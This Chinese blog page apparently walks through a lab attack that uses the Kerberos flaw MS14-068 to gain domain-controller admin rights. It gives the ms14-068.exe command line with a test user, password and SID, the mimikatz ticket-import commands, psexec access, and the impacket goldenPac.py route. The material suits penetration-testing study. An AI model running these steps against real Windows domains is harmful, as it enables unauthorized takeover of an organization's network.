zoukankan
html css js c++ java
MS14-068提权和impacket工具包提权
ms14-068提权
工具利用
a)拿下边界机win7,并已经有win7上任意一个账号的密码
-u 用户名@域
-p 用户密码
-s 用户sid
-d 域控
ms14-068.exe -u test3@superman.com -p Test#123 -s S-1-5-21-2030659959-700672918-1434258406-1113 -d win08.superman.com
生成一个ccache后缀票据
导入票据
导入之前,清空票据缓存
kerberos::purge
kerberos::ptc 票据
使用psexec工具连接win08(域控机器)尝试执行命令,看到的权限是test3的,但是实际上所属已经是win08上,并且是最高权限
impacket工具包提权
b) 没拿到边界机,但是有账号密码的情况
使用/impacket/examples下的goldenpac.py脚本
注意@domain-host 指的是域控机的位置
成功进入win08的命令行模式
查看全文
相关阅读:
ShopEx customSchema 定制能够依据客户的需求对站点进行对应功能的加入改动或者删除
Android 屏幕旋转 处理 AsyncTask 和 ProgressDialog 的最佳方案
NYOJ 46 最少乘法次数
彻底理解position与anchorPoint
链路层
留不住的2015
javascript笔记
<html>
高性能站点建设指南-前端性能优化(一)
监听器设计模式
原文地址:https://www.cnblogs.com/sup3rman/p/12329854.html
最新文章
关于“连接被重置”(转)
一致性哈希算法(consistent hashing)(转)
MAC地址
描述ARP协议的工作原理,怎么实施ARP攻击和防御ARP攻击
jvm垃圾回收原理(转)
ORM(Object-Relational Mapping 对象关系映射)如何实现(转)
数据库savepoint
Java与C/C++的比较(转)
解释一下,在你往浏览器中输入一个URL后都发生了什么,要尽可能详细(转)
opensslBIO系列之2---BIO结构和BIO相关文件介绍
热门文章
handler 源代码分析
LintCode-买卖股票的最佳时机
IBM openblockchain学习(四)--crypto源代码分析
大型票务系统自身特点所引入的安全性问题
9.6 聚合
LintCode-数组划分
gtk+3.0的环境配置及基于gtk+3.0的python简单样例
8.9.2 嵌套分析函数
Unix:关于一个file在file system和disk中占用空间
离线LCA学习
Copyright © 2011-2022 走看看